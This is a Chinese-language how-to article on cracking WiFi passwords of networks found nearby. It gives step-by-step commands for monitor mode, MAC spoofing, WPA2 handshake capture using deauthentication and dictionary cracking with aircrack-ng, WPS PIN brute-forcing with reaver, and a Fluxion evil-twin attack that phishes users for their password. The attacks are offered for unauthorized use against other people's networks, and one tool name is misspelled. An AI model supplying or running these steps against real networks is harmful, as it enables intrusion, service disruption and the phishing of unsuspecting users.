在現(xiàn)在的社會生活中，相信很多人都離不開wifi密碼。每到一個地方，當搜到WIFI信號而又不知道密碼的時候，有些人就想到通過如何破解WIFI密碼，從而達到連接WIFI信號上網(wǎng)。下面小編分享一些WIFI密碼破解方法，希望對大家有幫助。

如何破解WIFI密碼：

一、傻瓜式破解WiFi密碼法

我們可以通過借助“WiFi萬能鑰匙”、“萌WiFi”、“WIFI精靈”等各種WIFI軟件來實現(xiàn)破解周圍WiFi密碼，這個方法沒有什么難度，搜索相關(guān)軟件安裝后打開WIFI破解功能，然后把軟件退回后天運行，你就可以連上WIFI信號上網(wǎng)了。

二、自家的WIFI密碼破解方法

如果是自家的WIFI，就不建議去破解它密碼了，如果你忘記了WIFI密碼，就通過密碼找回或者重置WIFI密碼就行，可參考如下文章。

1、wifi密碼查看方法 手機怎么查看wifi密碼

2、電腦怎么查看wifi密碼 兩招教你電腦上查看WIFI密碼方法

3、如何重置wifi密碼 重置wifi密碼的步驟

三、專業(yè)級WIFI密碼破解方法

這個方法是比較高級的，不是隨便一個人就知道操作，如果是電腦小白的就不要浪費時間了。

1.Aircrack-ng套件

非常優(yōu)秀的無線網(wǎng)絡(luò)分析套件，功能強大.

許多安全軟件套件都默認(添加/調(diào)用)此套件來完成操作.

--首先，先要切換到能夠支持\\\\\\\\\\\\\\\\'混雜模式\\\\\\\\\\\\\\\\'的網(wǎng)卡(一般都是購買USB無線網(wǎng)卡)

--開啟混雜模式(開啟之后，網(wǎng)卡名可能會改變)

> ifconfig (網(wǎng)卡名) down

> iwconfig (網(wǎng)卡名) mode monitor

> ifconfig (網(wǎng)卡名) up

1.1.連接MAC地址綁定的wifi

--查看附件網(wǎng)絡(luò)中的wifi，并觀察其詳細信息(channel、BSSID(MAC)等)

> airodump-ng (網(wǎng)卡名)

--得知詳細信息后，可以停止查看(ctrl+c)

--開始拿有效的mac地址信息(盡量等久點，包多點)

> airodump-ng -c (信道channel) --bssid (BSSID(MAC) (網(wǎng)卡名)

--拿到有效mac地址(不要拿到路由器的mac)

--修改本機mac

> ifconfig (網(wǎng)卡名) down

> macchanger -m (MAC地址) (網(wǎng)卡名)

> ifconfig (網(wǎng)卡名) up

--注意，此方法拿到有效mac地址，并未拿到wifi密碼

1.2.WPA2加密的wifi

--查看附件網(wǎng)絡(luò)中的wifi，并觀察其詳細信息(channel、BSSID(MAC)等)

> airodump-ng (網(wǎng)卡名)

--得知詳細信息后，可以停止查看(ctrl+c)

--開始進行查看route與client的mac地址，[-w]選項的意思就是write

> airodump-ng -w wpa -c (信道channel) --bssid (BSSID(MAC) (網(wǎng)卡名) --ignore-negative-one

--查看route與client的mac地址

--開始獲得握手包.cap

> airoplay-ng --deauth 10 -a (route的mac) -c (client的mac) (網(wǎng)卡名) --ignore-negative-one

--對握手包.cap進行破解

aircrack-ng -w (指定字典) (cap握手包名)

--字典可以自己制作(Crunch工具)，也可以在網(wǎng)上下載大神的字典

--一個NB的字典，對你的破解!事半功倍!

1.3.WEP加密的wifi

--由于這種加密基本已經(jīng)舍棄了，所以就不說了

1

2.路由器的PIN碼破解

通過輸入PIN碼來連接wifi也是可以的，PIN碼的破解也是一種不錯的方法.

常見的工具有reaver、minidwep-gtk等工具，這里我就說下reaver工具.

--首先，先要切換到能夠支持\\\\\\\\\\\\\\\\'混雜模式\\\\\\\\\\\\\\\\'的網(wǎng)卡(一般都是購買USB無線網(wǎng)卡)

--開啟混雜模式(開啟之后，網(wǎng)卡名可能會改變)

> ifconfig (網(wǎng)卡名) down

> iwconfig (網(wǎng)卡名) mode monitor

> ifconfig (網(wǎng)卡名) up

--選做:可以嘗試掃描是否有啟用WPS的wifi

--Wash工具就是一款針對\\\\\\\\\\\\\\\\'判斷wifi是否啟用WPS\\\\\\\\\\\\\\\\'的工具

--查看附件網(wǎng)絡(luò)中的wifi，并觀察PWR值小于70的來破解(記錄BSSID，記住要是路由器的)

> airodump-ng (網(wǎng)卡名)

--開始進行破解(注意是路由器的MAC地址，PIN碼是針對路由器的)

> reaver -i (網(wǎng)卡名) -b (路由器MAC地址) -a -S -vv

--1.如果出現(xiàn) warning fail to associate ...

--則說明破解失敗(失敗原因包括對象路由器未開啟WPS等)

--2.提示給出了 PIN碼 或 PIN碼和PSK密鑰(wifi密碼)

--則說明破解成功(記錄PIN碼)/(使用PSK密鑰直接嘗試連接wifi)

--選做:可以嘗試得到wifi密碼(PIN碼是可以連wifi)

reaver -i (網(wǎng)卡名) -b (路由器MAC地址) -p (剛得到的PIN碼)

3.Fluxion工具(推薦)

一個非常不錯的社工破解wifi神器.

與前面操作思路不同.

它是通過模擬原有wifi(FakeAP)，用戶進行連接

然后wifi會斷開網(wǎng)絡(luò)，并向連接用戶發(fā)送請求(瀏覽器跳轉(zhuǎn)頁面)，請求輸入原wifi密碼

用戶在收到請求后，只需輸入正確密碼，wifi就會恢復(fù)網(wǎng)絡(luò)，而你獲得wifi密碼

注意，F(xiàn)luxion會自動判斷wifi密碼是否正確，從而做出下一步操作

ps.此方法的好處就是不用耗費資源去破解密碼.

ps.Fluxion運行時需要調(diào)用許多其它工具，部分工具可能需要另行下載(運行時會提示有哪些未下載)

--運行軟件(在軟件目錄下)

> ./fluxion

> 網(wǎng)卡(選擇網(wǎng)卡)

> channels(選擇所有信道)

> 掃描wifi(掃描到需要的結(jié)果時，按ctrl+c)

> 選擇wifi(輸入1、2、3等選擇)

--建立一個假AP

> 選擇攻擊方式(選FakeAP-Hostapd...)

> 選擇保存路徑(可空格跳過，則保存在桌面/root/Desktop/)

--會自動出現(xiàn)窗口

> 握手包選擇(aircrack-ng...)

--抓包分配包

> 數(shù)據(jù)包分配(Deauth all)

--若是以上步驟正確完成，等抓包抓完，會出現(xiàn)選擇

> 選擇web interface

> 選擇語言(提示用戶輸入密碼時的界面語言)

--等待用戶連接上網(wǎng)，在瀏覽器輸入正確密碼(工具會自動驗證密碼是否正確)，工具就會自動停止

--獲得wifi正確密碼

破解wifi可以說是比較有意思、并且有挑戰(zhàn)性的一塊知識點了，

更多的無線攻防操作，其實都是建立在連入局域網(wǎng)的前提之下的。